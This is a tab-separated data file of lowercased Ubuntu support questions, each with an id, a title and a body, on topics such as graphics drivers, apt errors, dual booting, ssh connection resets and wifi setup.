485675	i have to shut down and restart to adjust brightness	occasionally when i turn on my laptop , i am unable to adjust the brightness . once i shut down and restart ubuntu , i can do this , but it is becoming more frequent and inconvenient .
485676	black screen in ubuntu 14.04	today i have installed ubuntu 14.04 using vmware . the problem is that when i turn on the virtual machine ( ubuntu 14.04 ) then it takes me to the console not the gui , i searched through google and found it that is it possible problem with the graphics driver , i tried to update all drivers using command line still no success . i tried the recovery mode but same issue , i have also tried `` nomoddset '' but still no success , i have tried almost all solutions that are given here . sorry i cant add comments due to low reputation otherwise i would have comment there : ) my laptop config : dell studio 1558 core i3 intel hd graphics 4gb ram
485677	ubuntu 14.10 with linux kernel 3.15-rc8	please , where can i find : ubuntu 14.10 with linux kernel 3.15-rc8 ( iso file ) kernel version to be 3.11 or higher thanks a lot . best regards .
485678	how to install older version of java with the webupd8 ppa	i 'm trying to install java via the webupd8 ppa . normally , this is n't an issue , it 's just a quick sudo add-apt-repository .. sudo apt-get update sudo apt-get install .. however , i find that the newer versions of java are breaking things , so i want to revert to an older version ( 7u51 , specifically ) i see here that they at one point had it , i assume they still do.. but how would i access it via command line ? or where could i find a .deb with it ?
485679	mount dvd player wodim	i got got following error message when i use wodim -- devices to know the devices and want to mount my device , what should i do to resolve the error message ? your help and information is great appreciated , regards , iccsi $ wodim -- devices wodim : no such file or directory . can not open scsi driver ! for possible targets try 'wodim -- devices ' or 'wodim -scanbus ' . for possible transport specifiers try 'wodim dev=help ' . for ide/atapi devices configuration , see the file readme.atapi.setup from the wodim documentation .
485683	mount usb to serial adapter canbus and can-utils ubuntu ?	i have this adapter and i 'm trying desperately to mount in in ubuntu so i can use can-utils to monitor the device but i 'm failing . i 'm trying to communicate with a serial to can-bus adapter in 14.04 with can-utils this is the canopen device i 'm trying to get at and this is the adapter i 'm using dmesg : [ 4316.555254 ] usb 3-3 : new full-speed usb device number 8 using xhci_hcd [ 4316.572534 ] usb 3-3 : new usb device found , idvendor=1a86 , idproduct=7523 [ 4316.572541 ] usb 3-3 : new usb device strings : mfr=0 , product=2 , serialnumber=0 [ 4316.572545 ] usb 3-3 : product : usb2.0-serial [ 4316.573058 ] ch341 3-3:1.0 : ch341-uart converter detected [ 4316.574083 ] usb 3-3 : ch341-uart converter now attached to ttyusb1 [ 4836.845113 ] can device driver interface [ 5389.346203 ] can : broadcast manager protocol ( rev 20120528 t ) [ 5570.910652 ] systemd-hostnamed [ 23407 ] : warning : nss-myhostname is not installed . changing the local hostname might make it unresolveable . please install nss-myhostname ! that is dmesg out put for the device which i think is the device . lsusb gives me : bus 003 device 002 : id 1a86:7523 qinheng electronics hl-340 usb-serial adapter i 've managed to mount it to slcan0 like so : sudo slcand -o -s6 -t hw -s 3000000 /dev/ttyusb2 ip link set up slcan0 ip link then gives me : 6 : slcan1 : < noarp , up , lower_up > mtu 16 qdisc pfifo_fast state unknown mode default group default qlen 10 link/can no matter what i then throw at it via cansend i ca n't get a response back ...
485684	can not login after update to ubuntu 14.04	after i updated to ubuntu 14.04 , i am not able to login to ubuntu . whenever i enter my password , my screen flashes for a couple of seconds and goes back to the login screen . i have tried over and over again but the same thing happens . i ca n't login through the guest session either - whenever i click login , the screen flashes and goes back to the login screen again . what do i do ? i 'm really confused and stuck and i need to fix this problem really soon ! thanks !
485686	strange desktop background after log in in xubuntu	i installed xubuntu recently . the login screen looks normal . every time after i write my password in the log in box and press 'log in ' , the wallpaper disappears for about 5 seconds and i see this : this image fills the screen , ant then the taskbar appears at the top of it . and after that the wallpaper i had set appears normally . i wanted to ask if seeing this strange mixture of dots as wallpaper after log in is normal , and if it is n't , i 'd like to know if i can do something to avoid it and instead see immediately my wallpaper after log in . thanks
485689	pipelight not working on netflix	i have ubuntu 14.04 and i installed pipelight by following these instructions and switched my user agent . and i can run this test just fine . the problem is that netflix still gives me a drm error number n8156-6023 . how do i fix this ?
485690	musicmatch jukebox alternative	i am wondering if there is a music program similar to the old musicmatch jukebox that was available when windows xp first came out . i already have my music saved as mp3 . i want to be able to : play my music from a play list i create from my master list add to that list while my music is playing move songs around in that play list be able to save that play list . be able to copy the play list to my portable device or burn a cd of the playlist . is there any application available that can do that ?
485693	downgrade from php 5.5 to 5.3 on ubuntu 14.04	i need to downgrade to php 5.3 to use some older scripts . i 've tried phpfarm and phpbrew , but i could n't get either of them to work . i 've also tried the solutions listed here : installing php 5.3 in ubuntu 14.04 i 'm running a lamp setup on 14.04 . is there any way or would i be better off using a different version of ubuntu ?
485696	what is the most robust web frontend for mpd for linaro/ubuntu 14.xx ?	i 've built a headless server instance with linaro on a radxa rock connected to speakers , and am currently trying out rompr . does mpd offer any other `` streaming '' jukebox style frontend options for having one 's music streams or at least directories , all in one place/interface ? i am most interested in shoutcast/icecast streams , with the ability to add streams by url as needed if the do n't appear on popular directories . upnp detection of my local music on my lan would be a bonus , but not essential .
485699	can i play windows games through virtual desktop ?	i 've tried playing windows steam games through playonlinux , and it just glitches and closes . everybody on the forums says that it worked , and it does n't . is it possible to play steam games through a virtual desktop ? i.e . vmware ?
485701	dhcp running at startup	in order for my wifi at work to work i had to use wpa_supplicant , as the network manager just would not connect . manually i use two commands : sudo wpa_supplicant -b -i wlan0 -c /etc/wpa_supplicant.conf sudo dhcpclient -r wlan0 i run dhcpclient as soon as wpa_supplicant has finished starting which is almost instantaneous . i did some searching and saw that rc.local can be used to run commands at startup . i added the commands with no success . i figured dhcpclient was running too soon so i added a sleep for 10s in the middle . this still does n't work . the wpa_supplicant runs ( i assume ) as the only command i need is to run the dhcpclient -r wlan0 . i have to do this every time i reboot as dhcp just is n't working , although i did get the wifi to work . as an aside , wlan0 is present within the /etc/network/interfaces config file set to use dhcp . is there anyway i can get my wifi properly connected with dhcp at startup ?
485707	ubuntu 14.04 wired connection not working	i 'm brand new to linux so i thought i 'd give it a shot for my gaming pc i just built , however it says the wired connection is not connected . when it is i really ca n't give out the terminal info because it wo n't connect however when i ping my ip address in terminal it says unreachable and iâve tried a couple of other things so yeah can someone please help . i 'm just debating on getting a wireless card but i 'm not sure i 'll have the same problems so if you can help thanks . edit fixes code tags sudo lshw -c network *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd . physical id 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 06 serial 74 : d4:35:5a:67:98 size 10mbits/s capacity : 1gbit/s width : 64 bits clock:33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 1000bt 10000bt-fd autonegotiation n=2.3lk-napi duplex=half firmware=rtl8168e-3_0.0.4 03/27/12 latency=0 link=no muliticast=yes port=mmi speed 10mbit/s resources : irq:42 ioport=e100 ioport=e100 ( size 256 ) memory : fea000000-fea00fff memory : d0000000-d0003ff ifconfif -a eth0 link encap : ether net hwaddr 74 : d4:35:5a:67:98 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:7 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:858 ( 858.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 . inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:32 errors:0 dropped:0 overruns:0 frame:0 tx packets:32 errors:9 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:2432 ( 2.4 kb ) tx bytes:2432 ) 2.4 kb ) `for netstat -rn kernel ip routing table destination gateway genmask flags mss windows irtt iface for having the sudo dhclient -r then dhclient then the config showed eth0 link encap : ethernet hwaddr 74 : d4 : :35:5a:67:98 up broadcast multi cast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:133 errors:0 dropped:0 overruns:0 frame:0 tx packets:133 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:9505 ( 9.5 kb ) tx bytes:9505 ( 9.5 kb )
485708	keyboard not working in virtualbox installed in ubuntu 14.04	i ca n't get my virtualbox keyboard to work . i have linux mint as my guest os and the boot screen appears but i ca n't proceed further . can any kind soul help me with my problem please ?
485709	hadoop -version command not found	i edited the .bashrc file and set all the paths to the required folders of hadoop . but when running the `` hadoop -version '' the error was shown '' hadoop command not found ''
485710	similarities between n900 maemo 5 os and ubuntu	is ubuntu still the same as maemo 5 os ? please what 's there difference since both of them has .deb file ? can maemo 5 ( n900 ) runs ubuntu 's application ? & can ubuntu runs maemo 5 ( n900 ) 's apps too ? or are they the same ? am very sorry for the above questions pls , the reason is that this is my first time to use n900 and am not gud in programming especially using x-term but i like the phone .
485722	apt-get update is not working in ubuntu 14.04	why am i getting this error when using apt-get update ? e : could not open lock file /var/lib/apt/lists/lock - open ( 13 : permission denied ) e : unable to lock directory /var/lib/apt/lists/ e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ?
485723	make swap space look like real ram 12.04 server	is it possible to make swap space appear to look like real ram , i have had a few issues where programs will only use available real ram and not use swap . if it is possible how would i do this ?
485724	ca n't get back to windows 8.1 from seemingly dual boot to ubuntu	my laptop is pretty much brand new ( bought it this january ) . i just installed ubuntu 14.04 on my usb or atleast i think i did ( i 'm not sure ) . also , on startup , it does n't ask me which os i want and when i looked at the bios boot order , there was no windows at all . please help me get windows 8.1 back . i have no recovery disk since my laptop does n't have a cd drive and i only made a backup of my apps on another usb .
485726	set the grub default os : dual-boot windows 7 and ubuntu 14.04	i 'm running a dual-boot system , having installed ubuntu 14.04 after the windows 7 installation . grub , as you already know , sets ubuntu as a default/first operating system . the question is : how can i set grub to load windows 7 as a default/first os ? cheers ,
485727	how do i install ubuntu on my ibook g4 ?	i think my g4 is running tiger , but i 'm not sure . i want to run any ubuntu that will work . i downloaded 14.04 via wi-fi , but it says there is `` no mountable files systems . '' any suggestions ? i do n't have any disks or a flash drive with ubuntu on them .
485731	will it cause harm when abort ubuntu software upgrade halfway ?	today i 'm upgrading my ubuntu software , but the net connection is slow . so i abort it use ctrl + z . will it do any harm to aborting the upgrade process ? it 's currently on this status : get:1 http : //cn.archive.ubuntu.com/ubuntu/ trusty-updates/main bash i386 4.3-7ubuntu1 [ 548 kb ] get:2 http : //cn.archive.ubuntu.com/ubuntu/ trusty-updates/main dpkg i386 1.17.5ubuntu5.3 [ 1,936 kb ] get:3 http : //cn.archive.ubuntu.com/ubuntu/ trusty-updates/main mount i386 2.20.1-5.1ubuntu20.1 [ 113 kb ] q get:4 http : //cn.archive.ubuntu.com/ubuntu/ trusty-updates/main tzdata all 2014e-0ubuntu0.14.04 [ 181 kb ] q get:5 http : //cn.archive.ubuntu.com/ubuntu/ trusty-updates/main util-linux i386 2.20.1-5.1ubuntu20.1 [ 450 kb ] get:6 http : //cn.archive.ubuntu.com/ubuntu/ trusty-updates/main libapt-pkg4.12 i386 1.0.1ubuntu2.1 [ 633 kb ] 1 % [ 6 libapt-pkg4.12 469 kb/633 kb 74 % ] 26.5 kb/s 2h 33min 29s^z [ 2 ] + stopped sudo apt-get upgrade
485734	ubuntu nvidia driver	my laptop has nvidia and intel graphics card . i have decided to just stick to the nvidia drivers from ubuntu repos . either nvidia-331 or nvidia 334 from nvidia 's website was working , i do not remember which . things got messed up when i removed old linux-* packages by apt-get autoremove . now i can not get x to start properly . i get the low-graphics mode with the your screen , graphics card ... could not be detected properly message . i have tried : purging all nvidia packages reinstalling nvidia-331 nvidia-331-uvm creating xorg.conf by nvidia-xconfig and changing driver `` nvidia '' to driver `` nvidia-331 '' in xorg.conf but i am still having the same problem . which log file i should look at to diagnose and fix the problem ? i did see this error in xorg.8.log ( ee ) failed to load module `` nvidia '' ( module does not exist ... i tried modprobe nvidia-331 which fixes that error but i still have the same problem the last line of xorg.8.log is ( ii ) nvidia ( gpu-0 ) deleting gpu-0 ( ee ) server terminated succcessfully ( 0 ) . closing log file
485737	ubuntu 14.04 just recently ( this week ) started not shutting down	my ubuntu 14.04 just recently ( this week ) started not shutting down . what options are there for me ?
485742	services file in different directories	i 'm wondering why the services file is found in different directories throughout the system . why not just have the file in the $ path ?
485743	why am i am unable to update/upgrade/install software ?	whether through update manager , or through terminal , i error out . when i try sudo apt-get update & & sudo apt-get upgrade : fetched 1,024 kb in 20s ( 51.0 kb/s ) reading package lists ... done reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : linux-headers-generic : depends : linux-headers-3.13.0-29-generic but it is not installed e : unmet dependencies . try using -f. and when i try sudo apt-get -f install : unpacking linux-headers-3.13.0-29-generic ( 3.13.0-29.53 ) ... dpkg : error processing archive /var/cache/apt/archives/linux-headers-3.13.0-29-generic_3.13.0-29.53_amd64.deb ( -- unpack ) : unable to create /usr/src/linux-headers-3.13.0-29-generic/include/config/inotify/user.h.dpkg-new ' ( while processing./usr/src/linux-headers-3.13.0-29-generic/include/config/inotify/user.h ' ) : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/linux-headers-3.13.0-29-generic_3.13.0-29.53_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) when i open ubuntu software center , i get the following text : new software ca n't be installed because there is a problem with the software currently installed . do you want to repair this problem now ? i get the option to 'repair ' or 'cancel ' . if i hit 'repair ' , i get the following error : package operation failed the installation or removal of a software package failed . ( reading database ... 417598 files and directories currently installed . ) preparing to unpack ... /linux-headers-3.13.0-29-generic_3.13.0-29.53_amd64.deb ... unpacking linux-headers-3.13.0-29-generic ( 3.13.0-29.53 ) ... dpkg : error processing archive /var/cache/apt/archives/linux-headers-3.13.0-29-generic_3.13.0-29.53_amd64.deb ( -- unpack ) : unable to create /usr/src/linux-headers-3.13.0-29-generic/include/config/bug.h.dpkg-new ' ( while processing./usr/src/linux-headers-3.13.0-29-generic/include/config/bug.h ' ) : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/linux-headers-3.13.0-29-generic_3.13.0-29.53_amd64.deb error in function : dpkg : dependency problems prevent configuration of linux-headers-generic : linux-headers-generic depends on linux-headers-3.13.0-29-generic ; however : package linux-headers-3.13.0-29-generic is not installed . dpkg : error processing package linux-headers-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-headers-generic ( = 3.13.0.29.35 ) ; however : package linux-headers-generic is not configured yet . dpkg : error processing package linux-generic ( -- configure ) : dependency problems - leaving unconfigured the disk full error is odd , because none of my disks are full . i know this because when i run df , i get the following : filesystem 1k-blocks used available use % mounted on /dev/sda6 36178648 13162504 21155332 39 % / none 4 0 4 0 % /sys/fs/cgroup udev 3873544 12 3873532 1 % /dev tmpfs 776860 1384 775476 1 % /run none 5120 0 5120 0 % /run/lock none 3884300 25276 3859024 1 % /run/shm none 102400 68 102332 1 % /run/user /dev/sda2 124327968 42583252 81744716 35 % /media/sudoer/48aec994aec97b48 /dev/sda3 807468724 121812996 685655728 16 % /media/sudoer/new volume what do i do at this point ? thanks in advance .
485749	is it better to install 14.04 now or wait to the 14.04.1 ?	i 'm using 13.10 , and do n't know if there will be `` extra updates '' ( like kernel or x ) in the 14.04.1 or if it 's the same as installing 14.04 right now . thanks .
485752	acer aspire 7741z : function key adjust brightness but displays 10 % in ubuntu 14	on my acer my brightness function key works , but the confirmation display only goes up to about 10 % . also the function key seems to be the only thing that will adjust the brightness . i can not adjust the brightness from system settings .
485754	`` package libmono-security4.0-cil is not ready for configuration '' how to make it ready ?	i 'm getting this error new software ca n't be installed , because there is a problem with the software currently installed . do you want to repair this problem now ? and other than this error message popup has only two button . `` cancel and `` repair '' and when i click repair , same pop up comes back . my ubuntu version is 14.04 lts jitendra @ jitendra-dell-system-xps-l502x : ~ $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : cli-common libmono-corlib4.5-cil libmono-i18n-west4.0-cil libmono-i18n4.0-cil libmono-security4.0-cil libmono-system-configuration4.0-cil libmono-system-security4.0-cil libmono-system-xml4.0-cil libmono-system4.0-cil libthunarx-2-0 libtumbler-1-0 mono-4.0-gac mono-gac mono-runtime mono-runtime-common mono-runtime-sgen thunar-data tumbler tumbler-common xfdesktop4-data use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 230 not upgraded . 1 not fully installed or removed . need to get 0 b/110 kb of archives . after this operation , 0 b of additional disk space will be used . dpkg : error processing package libmono-security4.0-cil ( -- configure ) : package libmono-security4.0-cil is not ready for configuration can not configure ( current status `half-installed ' ) e : sub-process /usr/bin/dpkg returned an error code ( 1 ) jitendra @ jitendra-dell-system-xps-l502x : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : cli-common libmono-corlib4.5-cil libmono-i18n-west4.0-cil libmono-i18n4.0-cil libmono-security4.0-cil libmono-system-configuration4.0-cil libmono-system-security4.0-cil libmono-system-xml4.0-cil libmono-system4.0-cil libthunarx-2-0 libtumbler-1-0 mono-4.0-gac mono-gac mono-runtime mono-runtime-common mono-runtime-sgen thunar-data tumbler tumbler-common xfdesktop4-data use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 230 not upgraded . 1 not fully installed or removed . need to get 110 kb of archives . after this operation , 0 b of additional disk space will be used . get:1 http : //ubuntu.uhost.hk/ trusty/main libmono-security4.0-cil all 3.2.8+dfsg-4ubuntu1 [ 110 kb ] fetched 110 kb in 1s ( 86.9 kb/s ) dpkg : error processing package libmono-security4.0-cil ( -- configure ) : package libmono-security4.0-cil is not ready for configuration can not configure ( current status `half-installed ' ) e : sub-process /usr/bin/dpkg returned an error code ( 1 )
485757	counter strike problem with ubuntu	i figured this is an error with ubuntu , so i thought i should post it here . i recently installed counter strike on ubuntu 13.10 , but some of the text does n't show up . the menus are fine , but then i have stuff like this i 'm not running it under wine , or anything . is this a problem with the game , or ubuntu ? is there a way to fix it ? update : counter strike : condition zero has the same glitch
485758	ubuntu on vmware fusion resolution not changeable from 800x600	on ubuntu in `` systems setting '' -- > `` display '' , i only see 800x600 resolution option . as i change the size of the vm window , it just expands/shrink accordingly , maintaining the same ratio ( 800x600 ) that is way too narrow for me . already tried but no good : on vm 's setting -- > `` display '' , i tried checking both on/off with `` accelerate 3d graphics '' or `` user full resolution for retina display '' . add pref.autofitguesttowindow = `` false '' to ~/library/preferences/vmware fusion/preferences ( https : //communities.vmware.com/message/2342718 ) any idea is appreciated . vmware fusion 6.0.3 with vmware tools installed . osx 10.9.3 on macbook pro , retina 15-inch vm : ubuntu 12.04 64b
485760	added ppa , ca n't get updated packages	alright , i 'm no so much a ubuntu novice , but this one has me pulling my hair out . i 've done this a million times before , but this time something is just not working . i have added 2 ppa 's : ppa : xorg-edgers/ppa ppa : oibaf/graphics-drivers and both show up in my software sources ( source code is unchecked , like normal ) performed a sudo apt-get update followed by sudo apt-get install mesa to get my latest amd open-source drivers but ... e : unable to locate package mesa here is the launchpad http for the package i want : https : //launchpad.net/~oibaf/+archive/graphics-drivers i really have no idea what is going on this time over something so seemingly easy . running ubuntu 14.04
485763	installed komodo edit wo n't open	i just installed komodo edit . i installed it with tar -zxvf komodo-edit-8.5.3-14067-linux-x86.tar.gz looked like it installed but it does n't open when i type komodo or komodo-edit in terminal . just says command not found . i checked software center and it 's not there either .
485764	problem in updation of ubuntu 12.04 lts version	get:72 http : //in.archive.ubuntu.com precise-backports/universe translation-en [ 32.9 kb ] fetched 19.5 mb in 7min 42s ( 42.1kb/s ) w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/precise-updates/main/i18n/index no hash entry in release file /var/lib/apt/lists/partial/in.archive.ubuntu.com_ubuntu_dists_precise-updates_main_i18n_index e : some index files failed to download . they have been ignored , or old ones used instead .
485767	running a game problem	when i firstly ran mafia 2 game -on wine- a black screen is shown without any other progression , but lately the normal screen shown up ( i mean the intro of the game ) , but the game stops during the intro . can anyone help with that problem ?
485768	using xawtv streamer to stream before snapshot	i am curious if anyone knows a way to stream prior to snapshot with the streamer package from xawtv . what i want is to take a snapshot using streamer , but see what the camera is pointing at before i try to take the photo . currently i use streamer -c /dev/video0 -s 800x600 -o outfile $ i.jpeg to capture photos , but i do n't get to first see what i am taking a picture of . i am using ubuntu 12.04
485769	restart instead of shutdown after suspend	i am running ubuntu 14.04 on my lenovo thinkpad t530 . i noticed that if i suspend the laptop at some point , the next shutdown will instead cause a restart . it seems that i am not alone with this ( and many other questions ) , and i tried most solutions i could find , but nothing worked . so far the best ( or only ) working solution was to boot with acpi=noirq . this fixes the issue , but then suspending the laptop does n't lock it . there may be other side-effects which i have n't found as i do n't understand the implications of this kernel parameter . what does acpi=noirq do , exactly ? how can i lock the computer on suspend ? is there another solution ? things i have tried : sudo ethtool -s eth0 wtol d ( no effect ) sudo apt-get install laptop-mode-tools ( does n't shut down correctly anymore at all ) deactivating `` wake on lan '' in my bios ( no effect ) try to shut down with sudo shutdown now and similar ( no effect )
485773	how to encrypt ubuntu 14.04 and all data inside ubuntu 14.04	i am testing ubuntu . i have installed ubuntu 14.04 using an iso file inside oracle virtualbox . my computer is 32 bits , with 4 gb of ram , and operates with windows xp-sp3 as the host system . ubuntu 14.04 is the guest system . i want to encrypt the whole virtual hard drive where ubuntu is located ( inside a virtual machine ) . i was trying to download from a website truecrypt for linux ( using firefox in ubuntu i can reach that website where truecrypt can be downloaded inside ubuntu ) . but i read somewhere that ubuntu 14.04 can be fully encrypted from within ubuntu . i have several questions . in case that ubuntu ( and all data ) can be fully encrypted from within ubuntu , is this encryption really strong ? in case ubuntu can be encrypted from within ubuntu , where can encryption be turned on ? should encryption be turned on while installation of ubuntu is taking place , or is it turned on when ubuntu has been fully installed within the virtual machine ? i hope my question is clear . my idea is to fully encrypt ubuntu ( inside vm ) and all data inside ubuntu . is this procedure ( encryption of the whole system inside the vm ) are all possible ? should i use truecrypt ( this probably is not possible ) , or should i encrypt with confidence from within ubuntu 14.04 ? what are the steps to encrypt from within ubuntu ? any advice will be highly appreciated . thanks in advance .
485776	'randr extension not present ' error message when setting up dual monitors in ubuntu	i am running 32-bit ubuntu precise ( 12.04 ) and trying to set up dual monitors . i have 2 amd/ati cayman xt [ radeon hd 6970 ] video cards in crossfire mode ( if that makes a difference ) and no proprietary drivers installed , but might have installed fglrx_12.104-0ubuntu_i386 driver , the output of the following command 'glxinfo | grep -i vendor ' is this : server glx vendor string : ati client glx vendor string : ati opengl vendor string : advanced micro devices , inc . the problem is when i select the display icon form the system settings i get the following error : could not get screen information . randr extension not present . i can see the extension of my left desktop on my right except that i have to move my mouse to the left side of my left monitor which takes me to the right side of my right monitor . i would like to be able to just move the mouse from the left to right monitor through the center which is something i can not do now . i tried downloading libxrandr2 version 2:1.3.2-2-ubuntu0.2 along with libxrandr2-dev libxrandr-dev libxrandr0-dev and x11proto-randr-dev thinking that that would solve the issue by it did n't . any ideas what i should do ? edit : i just had to purge all proprietary drivers and then reinstall them and now everything works .
485777	openssh server is refusing connections by blocking or resetting	on a quite fresh install of ubuntu 14.04 ( machine1 ) , i have openssh-server with a completely default config . when connecting from machine2 on the lan , with an empty ~/.ssh , i get the following debug output from the server ( running as /usr/sbin/sshd -p 22 -d -d -e ) : http : //pastebin.com/wehgzsum and the relevant bits are probably : debug1 : permanently_set_uid : 118/65534 [ preauth ] debug1 : list_hostkey_types : ssh-rsa , ssh-dss , ecdsa-sha2-nistp256 , ssh-ed25519 [ preauth ] debug1 : ssh2_msg_kexinit sent [ preauth ] read from socket failed : connection reset by peer [ preauth ] debug1 : do_cleanup [ preauth ] ... when connecting from machine2 with my normal ~/.ssh that works on many servers , i get the following debug output on machine1 : http : //pastebin.com/uxkfaysl in both cases , on machine2 , the client reports : http : //pastebin.com/dtp4mnne which looks normal to me until the last line : ssh_exchange_identification : read : connection reset by peer on server and client , ssh client is version : openssh_6.6p1 ubuntu-2ubuntu1 , openssl 1.0.1 14 mar 2012 and the server has version : openssh_6.6.1p1 ubuntu-2ubuntu2 , openssl 1.0.1f 6 jan 2014 the exact same client command that fails remotely works perfectly on the server , machine1 , so it 's not an account problem . earlier , before i upgraded my ssh client on machine2 , ssh would block indefinitely , after showing this debug output http : //pastebin.com/jsx6r7yp and on the server i 'd see the following in auth.log jun 19 22:27:47 lemur sshd [ 6491 ] : did not receive identification string from 192.168.1.12 update : turns out ( thanks to @ chaos ) this had nothing to do with ssh . i had managed to set a bad netmask on the server machine of 255.255.255.255 instead of 255.255.255.0 . this caused issues for routing inbound traffic from the lan , but not from the router .
485778	ca n't get shortcut to work in gnome	i 'm trying to set up qwerty shortcuts with dvorak layout but ca n't seem to send the key presses can someone look at this and tell me what i am doing wrong xdotool is working if i manually run it in terminal so i do n't think that is my problem . i have been able to get a single word command with no problem so perhaps it is something to do with xdotool or the quotation marks . if i remove them then the command does n't run and it just prints the letter .
485782	connect to wireless device by wifi	i am trying to connect a mobile hot spot [ without any password ] from linux device . the name of the hotspot is '' wt19i-sid '' without any password . but i ma getting `` no dhcpoffers received . '' and i am not able to connect . i am able to detect the hotspot using the command `` iwlist wlan0 scan '' i used the steps mentioned in the askubuntu link `` how to connect and disconnect to a network manually in terminal ? '' . root @ lucid-desktop : /home/scripts # iwconfig wlan0 essid root @ lucid-desktop : /home/scripts # dhclient internet systems consortium dhcp client v3.1.3 copyright 2004-2009 internet systems consortium . all rights reserved . for info , please visit https : //www.isc.org/software/dhcp/ listening on lpf/wlan0/00:0d : f0 : af : c9 : e5 sending on lpf/wlan0/00:0d : f0 : af : c9 : e5 listening on lpf/eth0/00:04:5f:92:42 : f9 sending on lpf/eth0/00:04:5f:92:42 : f9 sending on socket/fallback dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 7 dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 7 dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 7 dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 11 dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 10 dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 13 dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 15 dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 7 dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 15 dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 11 dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 11 dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 8 no dhcpoffers received . no working leases in persistent database - sleeping . i am sorry for a duplicate question but i was not able to add a comment to the answer provided in the above mentioned link because of less reputation .
485786	how to show list of installed extensions for firefox via command line ?	what is the command line to show the list of all installed extensions on the firefox browser ? is there any . i checked man firefox but did not help .
485788	how to launch shotwell when a camera gets plugged in ?	ubuntu 14.04 ( fresh install ) . about this computer - > removable media - > select how media should be handled photos = > shotwell when i plug in a digital camera ( canon powershot sx20 is ) , a media-icon appears and the camera get mounted . shotwell however does n't pop up . there have been some troubles recently to import photos bug 1296275 - ptp cameras , but in my opinion this item has n't any relationship with the launching of shotwell . so how can i automatically launch shotwell ? in previous ubuntu-versions shotwell was launched at plugging in a camera ( one had to specify this in nautilus ) .
485789	install ubuntu , gigabyte 990fx motherboard	i am trying to install ubuntu 13.10 onto my new computer so i can dual boot with windows 7 . i already have 7 on a ssd set to ahci and it is in legacy mode . i am trying to install ubuntu onto a hard drive , but have run into some problems . the first time i installed ubuntu it would n't connect to a wired network , and only ran in low graphics mode . i wiped and reformatted the said hard drive after that and went for a second attempt , with no success . i have wiped the drive again and started over , except this time i decided to try ubuntu instead of installing and from a live cd it immediately entered a low graphics mode . i did some research and found that my motherboard might be a problem . here are my current system specs : • amd fx-6300 • gigabyte 990fxa-ud3 rev . 4.0 ( realtek gbe lan chip ) • sapphire r7-260x 2gb • pny xlr8 ddr3-1600 ( 8gb ) • kingston ssdnow v300 60gb ( windows 7 installed ) • western digital caviar blue 500gb ( future ubuntu home ) • western digital caviar blue 1tb ( applications and stuff ) to the best of my knowledge the r7-260x and linux , should be able to place nice together , yet whether i try or install ubuntu , i 'm in low graphics mode . is the motherboard hindering the entire process here ? is there a piece of the hardware that is preventing the kernel from seeing and recognizing the graphics card and network chip ? the closest answer i have found to this problem was here . i have tried setting the network stack to enable along with the iommu before the install to see if that would work when just trying ubuntu from the live cd but that did not work . • do i have to do a full install first , then change the motherboard options ? • or will i have to install ubuntu , download the realtek drivers from their site , and install via usb ? • also , will i have to do the same thing for my graphics card ? i would really like to eventually migrate to linux full time or at least most of the time . i have messed around with ubuntu on my old ( 8 years old ) hp laptop , but if my hardware and software do n't place nice i do n't know if that will be an option . i do n't want to only use ubuntu on outdated hardware with no real upgrade options . as i am new to the world of linux , please be as direct and precise as possible on how to go about addressing these issues with my current hardware if there is a solution . thank you for your time .
485793	how to backup steam downloads ?	recently i have installed some games from steam . the size of those games may be about 50gb . i install fresh copy ubuntu frequently . but that will delete all the games that i downloaded . so , i was thinking if there is any way of backing up those downloads without breaking any laws .
